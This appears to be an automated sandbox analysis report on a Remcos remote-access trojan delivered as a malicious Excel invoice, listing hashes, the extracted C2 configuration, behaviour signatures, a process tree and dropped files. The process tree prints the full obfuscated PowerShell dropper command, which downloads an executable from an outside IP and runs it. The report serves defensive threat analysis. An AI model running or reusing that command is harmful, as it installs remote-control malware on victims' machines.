remcos | bbfa2653ffb918121ecb6457991267689d3802e2afcbba498f0e3ef0e6740a96

Analysis

max time kernel
149s
max time network
148s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
27-08-2024 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Inv 30532.xls
Size

547KB
MD5

560b9bdb75835822ed9f84d46521fd38
SHA1

e68f1783002016aabecfd74ef333b90be19262ac
SHA256

bbfa2653ffb918121ecb6457991267689d3802e2afcbba498f0e3ef0e6740a96
SHA512

55f533cc57c8379de0c5227ccef9e237ad512844dfde30d112b6b86932f9024cae30de0dcd57a12abf8819174e6319ccc2fb4493df773360021e3afd9c49dd83
SSDEEP

12288:WI1GWVjZScJbyWKEVuqg2/6VnDIh7xOP1fJYWe/egIY4Fg3lh:WCrjZsWKElYnvtfw/ed

Score

10^/10

remcos remotehost defense_evasion discovery evasion execution persistence rat themida trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

192.3.101.172:9674

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
Log
keylog_path
%Temp%
mouse_option
false
mutex
Rmc-54ZTI0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	jhl_service.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
12	2168	mshta.exe
13	2168	mshta.exe
15	2008	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2232	cmd.exe
2008	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	jhl_service.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	jhl_service.exe

Executes dropped EXE 1 IoCs

pid	Process
2376	jhl_service.exe

Loads dropped DLL 2 IoCs

pid	Process
2008	powershell.exe
2376	jhl_service.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x00070000000174ca-59.dat	themida
behavioral1/memory/2376-84-0x0000000000300000-0x0000000000C62000-memory.dmp	themida
behavioral1/memory/2376-85-0x0000000000300000-0x0000000000C62000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\MyApp = "C:\\Users\\Admin\\AppData\\Roaming\\jhl_service.exe"	jhl_service.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jhl_service.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2376	jhl_service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jhl_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1968	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2008	powershell.exe
2008	powershell.exe
2008	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2008	powershell.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1968	EXCEL.EXE
1968	EXCEL.EXE
1968	EXCEL.EXE
1968	EXCEL.EXE
1968	EXCEL.EXE
2376	jhl_service.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2232	2168	mshta.exe	32
PID 2168 wrote to memory of 2232	2168	mshta.exe	32
PID 2168 wrote to memory of 2232	2168	mshta.exe	32
PID 2168 wrote to memory of 2232	2168	mshta.exe	32
PID 2232 wrote to memory of 2008	2232	cmd.exe	34
PID 2232 wrote to memory of 2008	2232	cmd.exe	34
PID 2232 wrote to memory of 2008	2232	cmd.exe	34
PID 2232 wrote to memory of 2008	2232	cmd.exe	34
PID 2008 wrote to memory of 1636	2008	powershell.exe	35
PID 2008 wrote to memory of 1636	2008	powershell.exe	35
PID 2008 wrote to memory of 1636	2008	powershell.exe	35
PID 2008 wrote to memory of 1636	2008	powershell.exe	35
PID 1636 wrote to memory of 2672	1636	csc.exe	36
PID 1636 wrote to memory of 2672	1636	csc.exe	36
PID 1636 wrote to memory of 2672	1636	csc.exe	36
PID 1636 wrote to memory of 2672	1636	csc.exe	36
PID 2008 wrote to memory of 2376	2008	powershell.exe	38
PID 2008 wrote to memory of 2376	2008	powershell.exe	38
PID 2008 wrote to memory of 2376	2008	powershell.exe	38
PID 2008 wrote to memory of 2376	2008	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Inv 30532.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1968

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C powersheLL.EXE -ex BYpasS -nOP -W 1 -c DevICeCREdEnTiALdePloymeNt ; Iex($(Iex('[SySTEm.tEXt.ENcODInG]'+[Char]0x3A+[char]0X3a+'Utf8.GetsTriNg([SYsTeM.COnVErT]'+[cHaR]58+[char]0x3a+'froMBaSe64STriNG('+[CHar]34+'JEZ4MEhSUXFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUkRFRkluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENxaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGRCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN2TnB6aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0YixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpUam1iWU10QmJkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtJQlJpSG9ST24iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVdHFQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRngwSFJRcU86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMTIuODEuMjI1LzQwMC9qaGxfc2VydmljZS5leGUiLCIkRW5WOkFQUERBVEFcamhsX3NlcnZpY2UuZXhlIiwwLDApO1N0QVJ0LVNMZWVwKDMpO1NUYVJ0LVBSb2NFU1MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcamhsX3NlcnZpY2UuZXhlIg=='+[Char]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powersheLL.EXE -ex BYpasS -nOP -W 1 -c DevICeCREdEnTiALdePloymeNt ; Iex($(Iex('[SySTEm.tEXt.ENcODInG]'+[Char]0x3A+[char]0X3a+'Utf8.GetsTriNg([SYsTeM.COnVErT]'+[cHaR]58+[char]0x3a+'froMBaSe64STriNG('+[CHar]34+'JEZ4MEhSUXFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUkRFRkluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENxaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGRCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN2TnB6aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0YixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpUam1iWU10QmJkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtJQlJpSG9ST24iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVdHFQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRngwSFJRcU86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMTIuODEuMjI1LzQwMC9qaGxfc2VydmljZS5leGUiLCIkRW5WOkFQUERBVEFcamhsX3NlcnZpY2UuZXhlIiwwLDApO1N0QVJ0LVNMZWVwKDMpO1NUYVJ0LVBSb2NFU1MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcamhsX3NlcnZpY2UuZXhlIg=='+[Char]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2008
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f2syklq_.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1636
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CEC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9CEB.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2672
  - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
      "C:\Users\Admin\AppData\Roaming\jhl_service.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DBFB4F662B3327D8A46CC42397A17A67

Filesize
345B

MD5
bb4eff5c9ad147e3bfa6f088e601333c

SHA1
f09cf1beea4138f524e17e3da763dfa923e7c5e9

SHA256
6c61f9f400dc4f3f18d5b4a29740d1bcd19a2aa2153da2951a57dc48f8c410ad

SHA512
d5530aee03bfd7acdf1b2222027ace09b01f47f2035c14b801c7805a7465dd7f49d92ff0aa4196428f0b3136f1299c46df6f2c5ba1176d70251d961f389e118f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
96696e9ab3b2fee6c8a1359f6ee841b2

SHA1
8c2a0312e245881a42fb4c4fe1a33611a943bda8

SHA256
e0830b4f15c82a280f70eada73a8bb4dbfae3afb00a106cfb0aaf67277137bbd

SHA512
c194aed4bfd5be2e0553f4f85350159503fb48e08b674c1fc32882b3c558616fb8917d522e942ebfc9c3a8bd1a7b69aa8e95907fdfab6ff8c1599b806d6c27b3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
79eaf170a1fbd918bc2d4c833555fcee

SHA1
956bdb880339bca57a1b0eeee46376eb75cef2cf

SHA256
33c06c3c3bc2d190fec116af47815d167267bf768e2400c9de52f367b559b313

SHA512
5d96ad9161845be666f9737929939071617824b16eaec7c1d1712d31694c8dba19ea3aadc2bf24f30816308fe332f9f8affc6c7751861833d1271da416902a6f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DBFB4F662B3327D8A46CC42397A17A67

Filesize
548B

MD5
b03abfdca6cace6f534585dc35a5b29b

SHA1
559d253967367b77b3dcbb1457e8d6fe948761d0

SHA256
f6c6b439c946754de062499e756af29d7814574427431f134ea8683a4bd1baff

SHA512
cbafc8285e515ba1f16686777ac65e48c1aa2525a3aa13a008649bf6309d9927c8456de650a0daf085c014e9e78b78192b13865e180c1d0173119f4d4e2429c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\FMnetwork[1].hta

Filesize
8KB

MD5
7c959a4affc47d937730dc9c396fc72c

SHA1
16ae0881f590b24f9ed0d64b232a4a6c04e8c497

SHA256
8f1ced17d7249385f7defacaea7a40e142532162a93b0a806085b0a488a75ff6

SHA512
8eb74c3632148e5080a86bb6ccf2a5a13ec5edb7b74370be68a16efae779911611f9429e23ec3e69374c7b3e76cb059dcf6f64ef65e00891366965b6c8871413

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab951E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log\logs.dat

Filesize
220B

MD5
d1281ddba303fca7d5654dee2a93b882

SHA1
545fc633dfcba2500a5271f4300fa0e476375152

SHA256
d5787c1bd96cd5612ef1e99d1fe11fa150f24cb5d603fdd2de15a948af1cfd06

SHA512
1c8752d33c762fbdbc2d1332fd994767938b99c42200b4836caac7ad66dce6f2533ec24cb95cfc8778f4cbeedbf9585d78d3d50be1c3b9b53d925508ed629e7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9CEC.tmp

Filesize
1KB

MD5
a728d3c0540bdc5e75755461d21dead0

SHA1
aa807d0c2ffe49df3aaf19c7985ab1d264342bda

SHA256
a1a141e086750446a749f948f6d24071fd3eb210b18ce88f6eb685eb703ea4b8

SHA512
c77feab689c053abf1af014ae03c76592634846146a837d4deeed9828bd0532df1e4cc41b56ba13c81c7247504b75756505754dec615443131457da1bf5e65d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\f2syklq_.dll

Filesize
3KB

MD5
cea379e75c0fb5126d75cc8c8fe70551

SHA1
e11b43a1224306822578ba7bb5a3103bcc4300e8

SHA256
5283bb85e9ad9277c29820e0ff4b921a627da4c964f282511d2bdf5a3cbde570

SHA512
c66b5e42d54423de85930dfa3a241805cdbf05f880fdfb24ed44188a8b44bd2d2fbc1e483fccf0b367fe624c256b2d6897fed8adbb36917b857849b2c0956c2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\f2syklq_.pdb

Filesize
7KB

MD5
83f2b76e8ae5a7d8f2289972d09effb3

SHA1
bcb452c1aa9d0bb402da43625bc23ee092d405bc

SHA256
5c56aee8c81cb8c8c36a5dd40817537a6116736e9febf083dda95cb11a9b32f2

SHA512
fd95521c177805942c8d3508c542114b41b680f5351cfa20efe48240589a1a9afe4b6bd6adbfae1bede5dbd60f45939942ad037012132e361c111803c181b134

Download Submit
C:\Users\Admin\AppData\Roaming\jhl_service.exe

Filesize
3.5MB

MD5
2e5655f2cfebe6357e6388e678f3c073

SHA1
f1d6b68d73a8da906368837c1cde74a26a900858

SHA256
3c74031a1ddcfbff9691d2992ecd540eb82c4b781bda9ffc5125d40ec712589d

SHA512
13477f0bc9a73809e7b069dc441c7fb0023178811f4fe3f39ccbc4b4c412516b612439d8025b0c79c33201c791b343cdcf7dec4a3fe7eabcd3e28b1cf520747f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9CEB.tmp

Filesize
652B

MD5
9845fd44960c2547434e88e4eb49135d

SHA1
9da1b23d8ac4875caedb98cbb762cc9858fd5b27

SHA256
b4f3974ae1a26bf62a0d58e4b13a643f1a55d00e38ec884a66e0c38f6be6d03a

SHA512
d919f2665bf73533daf212c98dbb23bb555a872426888ae4f034e0434b6d54ff4111683e05da0a6bbb7cecb6ad78a039d185b642b1298c83d8620ee7e67f4918

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f2syklq_.0.cs

Filesize
470B

MD5
a7d91e40bc8462dd21ffa32a88e9ac58

SHA1
ebe5e871f66c1cd16eee15877121c26df1c543b5

SHA256
d8e1f45e7f43c2bf3ab22a0de1df58a8163cfda639a1c942e17f0ec65aacd389

SHA512
60e15e58c29c33ff64c853e904081b42d509da70b67e67d7f9f9ee8dd1e3cb2a59d038b7942ee03798d2d8527c46e16f674a1647257b912ab60ba6d981e17d68

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f2syklq_.cmdline

Filesize
309B

MD5
19a6ab28eebc2daf04c1008486d339fd

SHA1
7c0eb3d831d031038a9d10d878707e4609ccf90d

SHA256
8da5fa65402f3aefd29510a7669f2618d269b1ebc425d6498a714ab2c6d86e76

SHA512
567e33f94adc4709be1f03b7eff61201f20356410f661a9a52009ba0d5c67f88e55a7d42853599372ebdd414c4fec841ba00e1e69ccd3bbde3cbc611edd9f69b

Download Submit
\Users\Admin\AppData\Local\Temp\57613b55.dll

Filesize
8KB

MD5
e1db733e43aa8d065fb7e8669db76524

SHA1
3f9c62ee28959959271632fdc7f5387d539a1d23

SHA256
9e65d9e8ebb895f3b03c95ce64f044c70251fff444a4bcbee83f558b599a614d

SHA512
3f6106f32932e72d197865f7b796eba072c8ab20c22b4d205f27de9b9fc6c139be8450ae25541fbdac37a06bc3ec2d1fab3f9b3216201a9231b70fcde6fb8eb3

Download Submit
memory/1968-19-0x0000000002DA0000-0x0000000002DA2000-memory.dmp

Filesize
8KB

Download
memory/1968-54-0x0000000071C4D000-0x0000000071C58000-memory.dmp

Filesize
44KB

Download
memory/1968-1-0x0000000071C4D000-0x0000000071C58000-memory.dmp

Filesize
44KB

Download
memory/1968-127-0x0000000071C4D000-0x0000000071C58000-memory.dmp

Filesize
44KB

Download
memory/1968-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1968-124-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2008-64-0x0000000006C50000-0x00000000075B2000-memory.dmp

Filesize
9.4MB

Download
memory/2168-18-0x00000000010A0000-0x00000000010A2000-memory.dmp

Filesize
8KB

Download
memory/2376-74-0x0000000000300000-0x0000000000C62000-memory.dmp

Filesize
9.4MB

Download
memory/2376-82-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-79-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-84-0x0000000000300000-0x0000000000C62000-memory.dmp

Filesize
9.4MB

Download
memory/2376-85-0x0000000000300000-0x0000000000C62000-memory.dmp

Filesize
9.4MB

Download
memory/2376-87-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-86-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-88-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-94-0x0000000000300000-0x0000000000C62000-memory.dmp

Filesize
9.4MB

Download
memory/2376-95-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-96-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-83-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-106-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-107-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-117-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-118-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-78-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-65-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-133-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-134-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-144-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2376-145-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download